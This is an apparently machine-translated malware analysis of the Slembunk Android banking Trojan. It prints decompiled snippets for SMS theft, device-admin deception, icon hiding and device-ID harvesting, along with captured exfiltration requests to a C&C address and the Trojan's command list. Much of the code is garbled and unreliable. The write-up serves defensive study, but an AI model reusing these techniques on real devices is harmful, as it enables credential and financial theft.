Slembunk Trojan

Slembunk was originally found by FireEye. Later, some other security companies have also discovered that the authors have been able to get the sample, analyzing that the Trojan discovers its design and further evolving on this basis. This sample is forged into other common Android applications, spoof users enter credit card-related sensitive information, and we will analyze step by step.

1 malicious behavior

1.1 Control lock screen behavior

The control power state is partial_wake_lock, in which case the CPU is active, even if it is turned off, the CPU is also running until the code actively releases.

Java

Public void oncreate () {

Super.oncreate ();

THIS.MWAKELOCK this. getSystemService (“Power”) .newwwakelock (1, “mywakelock”); // in partial_wake_lock mode regardless of the power OFF

This.mwakelock .acquire ();

}

1.2 Equipment Administrator

Get device administrator privileges, if there is no device administrator, it will pop up an interface for users to confirm, Device_Admin is the corresponding component, and add_explant gives the user explanation

Java

Public void checkdeviceadmin () {

ComponentName V0 New ComponentName ((Context), MyDeviceAdminReceiver.class;

IF (! this .deviceManager. Isadminactive (V0)) {

INTENT V1 NEW INTENT (“Android.App.Action.Add_Device_admin”);

V1. PutexTra (“Android.App.extra.Device_admin”, (PARCLABLE) V0);

V1. Putextra (“Android.App.extra.Add_explanation”, “Get Video Codec Access”);

THIS.STARTACTIVITY (V1);

}

}

1.3 hidden icon

When the user is installed, activates the device management permission, hides the icon, and the thing that is interesting to hide the icon has a small hidden code. For Smali, it may be not well read, but after the completion into Java, this code is a snatch.

Java

IF ((“3”. Equals (“3”)) || (“3” .Equals (“1”))) {

This.GetPackageManager () .SetComponentenableDsetting (New Componentname), Main. Class, 2, 1);

1.4 plan task

Java

Private void schedulelaunch () {

Calendar v0 calendar .getInstance ();

V0. add (12, this .restarttimeminutes);

INTENT V1 NEW INTENT (“com.slempo.service.activities.htmlstart”);

V1. Putextra (“VALUES”, this. getIntent (). getStringeXTRA (“VALUES”));

THIS.AM .SET (0, V0. gettimeinmillis (), PendingINTENT.GETBROADCAST ((Context) THIS, 0, V1, 0);

}

1.5 Application of Operational Run

Slembunk Trojans will decide whether to enable credit card spoofing page Java according to the current running application

Private string gettoprunning () {

List v1 this .getsystemService (“Activity”). GetRunningTasks (1);

String v3! V1.isempty ()? V1.get (0) .topactivity. Getpackagename (): “”

Return V3;

}

1.6 get SMS record

Java

Public Static String ReadMESSAGSFROMDEVICEDB (CONTEXT CONTEXT) {

Cursor v8;

URI V1 URI .PARSE (“Content: // SMS / Inbox”);

String [] V2 new string [] {“_id”, “address”, “body”, “date”}

Jsonarray V12 New Jsonarray ();

Try {

V8 context.getContentResolver () .query (V1, V2, NULL, NULL, NULL);

IF (v8! null) {

IF (! v8.movetofirst ()) {

Goto label_55;

}

Do {string v6 v8.getstring (“address”)); String V7 v8.getstring (V8.GetColumnIndex (“body”)); String V9 New SimpleDateFormat (“DD-MM-YYYY HH: mm: SS “, Locale.us) .format (line.parser”)))))))))))))))))))))))); , V13. PUT (“Body”, V7); V13. PUT (“Date”, V9); V12. PUT (V13); if (v8.movetonext ()) {Continue;} Break;} While (TRUE); }}

1.7 get a phone number

Java

Public static string getPhonenumber (context context) {

String V0 Context.getsystemService (“Phone”). GetLine1Number ();

IF (v0 null || (v0. Equals (“)))) {

V0 “”

}

Return V0;

1.8 get DeviceID

Java

Public Static String getDeviceId (Context Context) {

String V1;

String V0 Context.getsystemService (“Phone”). GetDeviceId ();

IF ((v0.equals (“)) || v0 null || (v0.equals (” 000000000000000 “))) {

V0 Settings $ secure.getstring (Context.getContentResolver (), “Android_ID”);

IF (v0! null&&! v0. Equals (“”)) {

Return V0;

}

V0 build.serial; if (v0! null & amp; & amp;!! v0. Equals (“”) & amp; & amp ;! v0. EqualsignoreCase (“unknown”)) {Return V0;} v1 “not available”;} else { V1 v0;} Return V1;

1.9 Settings boot start

The Trojan will be set to boot and listen to the external SD card, which will be started after the SD card is ready.

xml

intent-filter>

receiver>

intent-filter>

receiver>

1.10 listening SMS

Trojans send CC instructions through SMS, as can be seen from the AndroidmeniFest.xml section, and the Trojan is listening to the SMS application, and the permissions are higher than the system SMS application.

xml

intent-filter>

receiver>

Here is the RECEVIER’s onRecEive method:

Java

Public void onreceive (context context, intent) {

SharedPreferences V8 Context.getsharedPreferences (“AppRefs”, 0);

NEW hashset ();

Try {

Object V1 DataWraper .deSerialize (V8 .GetString (“Blocked_NumBers”, DataWraper.Serialize

NEW hashset ())))))))

}

Catch (Exception V2) {

V2. PrintStackTrace ();

}

Map v3 SendsmsRecevier. RETRIEVEMESSAGES (ITENT); Iterator v10 v3.keyset (). Iterator (); while (v10.hasnext ()) {Object v7 v10.next (); CommandCenter V6 New CommandCenter (v3. Get (v7), “” “, context); if (v6.ProcessCommand ()) {this.abortBroadcast (); continued;} Boolean v4 v6.needtointerceptincoming (); boolean v5 v6.needtolisten (); if (!! v4 & amp; & amp ;! (Hashset) V1) .Contains (V7)) {if (! V5) {Continue;} Senddata.sendListenedIncomingsms (Context, V3 .Get (V7), (String) V7)); Continue;} sendData.sendinterceptedIncomingsms (Context) , v3 .get (V7), (String) V7)); this.abortBroadcast ();}} 2 Trojans workflow

Trojan listens in AndroidManifest.xml a SMS_RECEIVED, ACTION_EXTERNAL_APPLICATIONS_AVAILABLE, BOOT_COMPLETED, DEVICE_ADMIN_ENABLED, com.slempo.service.activities.HTMLStart five action, while the number of registered activity and a service, in addition to the main activity, are some other deception Page, service is responsible for launching the corresponding Activity, requesting device management permissions. The following simplicity looks at the code process:

Launch MainServiceStart service in Main Activity, this service starts three thread periodic polling, determines the current application to start the pseudo credit card interface; request DeviceAdmin permissions; judgment instructions launch the corresponding pseudo-interface; send phone, IME and other sensitive information. The request for sending sensitive information is as follows:

POST / HTTP / 1.1

Content-Length: 481

Content-Type: Text / Plain; Charsetutf-8

Host: 181.174.164.25:2080

Connection: Keep-alive

User-agent: Apache-httpclient / unavailable (java 1.4)

{“OS”: “4.0.4”, “Model”: “Unknown SDK”, “Phone Number”: “15555215554”, “APPS”: [“com.android.gesture.builder”, “com.Android.WidgetPreview “,” com.example.android.Apis “,” com.example.Android.livecubes “,” com.example.Android.softkeyboard “,” com.joezykrim.rootcheck “,” de.Robv.Android.xposed.installer “” de.Robv.Android.xposed.installer.Staticbusybox “,” eu.slempo.supersu “,” org.slempo.service “],” IMEI “:” 8f986e65d50f299a “,” Client Number “:” 3 “, “Type”: “Device Info”, “Operator”: “310260”: “US”: “US”} also said that the Trojan will decide whether to start the pseudo credit card page according to the currently running application, the pseudo interface is as follows

The Trojan author has strict verified that the above-mentioned user information is first, and the credit card information must be legitimate. Second times must be between 2014 and 2020, to the credit card address information page, and have a strict association with the postal code and phone number. After filling all the information, it will be sent to the C & C host. The request is as follows:

POST / HTTP / 1.1

Content-Length: 401

Content-Type: Text / Plain; Charsetutf-8

Host: 181.174.164.25:2080

Connection: Keep-alive

User-agent: Apache-httpclient / unavailable (java 1.4)

{“data”: {“additional information”: “123456”: “VBV Password”: “qWERTY”}, “Type”: “Card Information”, “Card”: {“CVC”: “393”, “MONTH”: “12”, “Year”: “15”, “Number”: “4024 0238 6573 0515”}, “Billing Address”: {“Date of Birth”: “01.03.1990”, “Phone Number”: “212-925-2355”, “Street Address”: “Dalianganjinzi”, “Zip Code”: “10002”, “Phone Prefix”: “Name on Card”: “zhanghua” }}, “Type”: “User Data”, “CODE”: “- 1”} Appendix C & C Directive

CommandCenter.commands. Add (“# intercept_sms_start);

Commandcenter.commands .add (“#intercept_sms_stop”)

Commandcenter.commands .add (“#block_numbers”);

CommandCenter.commands .add (“#unblock_all_numbers);

CommandCenter.commands .add (“#unblock_numbers”);

Commandcenter.commands .add (“#lock”);

Commandcenter.commands .add (“#unlock”);

Commandcenter.commands .add (“#send” + “_sms”);

Commandcenter.commands .add (“#forward” + “_calls”);

Commandcenter.commands .add (“#disable_forward_calls”);

CommandCenter.commands .add (“#Control_Number”);

CommandCenter.commands .add (“#update_html”);

CommandCenter.commands .add (“#Show_html”);

Commandcenter.commands .add (“#wipe_data”);